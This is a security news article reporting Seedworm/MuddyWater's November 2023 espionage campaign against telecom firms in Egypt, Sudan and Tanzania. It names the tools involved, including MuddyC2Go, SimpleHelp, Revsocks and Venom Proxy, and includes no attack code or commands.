The telecommunications companies in Egypt, Sudan, and Tanzania have been the target of the Iranian espionage group Seedworm, which is known as Muddywater.
The attack took place in November 2023, and the attackers used a range of tools, including the recently found and published MuddyC2Go infrastructure by Deep Instinct.
Along with other publicly accessible and living-off-the-land tools, the attackers also use a custom keylogging tool, the SimpleHelp remote access tool, and Venom Proxy, which have been linked to Seedworm activities in the past.
MuddyC2Go Framework and Custom Keylogger Used
The attacks in this campaign, which targeted one specific telecom company, took place in November 2023. The initial indications of malicious behavior were certain PowerShell executions connected to the MuddyC2Go backdoor.
According to Symantec’s Threat Hunter Team, to establish a connection with its command-and-control (C&C) server, the MuddyC2Go launcher executed the following PowerShell code:
The variables at the initial stage of the code seem to be there merely to try and evade detection by security software because they are irrelevant and unutilized.
Immediately following this execution, the attackers used a previously established scheduled task to launch the MuddyC2Go malware. Additionally, the attackers employed a few standard instructions associated with the Impacket WMIExec hack tool.
Utilizing the SimpleHelp remote access tool, a connection was made to the C&C server at 146.70.124[.]102.
Additional PowerShell stager execution took place concurrently with the attacker running the Revsocks tool.
On the same computer as Revsocks and SimpleHelp, the attackers also used AnyDesk, a second authorized remote access application. MuddyC2Go-related PowerShell executions also took place on the same system.
It is speculated that the attackers utilized WMI to initiate the SimpleHelp installer on the victim network earlier in 2023. Although this behavior could not be linked to Seedworm at the time, it seems that the same group of attackers was responsible for the earlier activity.
In another incident, the attackers additionally employed a new custom keylogger, and they also executed a customized build of the Venom Proxy hack tool on this network.
For persistence on victim machines, SimpleHelp, a reliable remote device control and administration application, is used in this activity.
An open-source program called Venom Proxy is referred to as “a multi-hop proxy tool developed for penetration testers.” It is written in Go. It can be used to manage intranet nodes and proxy network traffic to a multi-layer intranet with ease.
Other tools used in this activity include Revsocks, AnyDesk, PowerShell, and Custom keylogger.
“The full capabilities of MuddyC2Go are not yet known, but the executable contains an embedded PowerShell script that automatically connects to Seedworm’s C&C server, which eliminates the need for manual execution by an operator and gives the attackers remote access to a victim machine”, researchers said.
This emphasizes how important it is for businesses to be alert to any unusual PowerShell usage on their networks.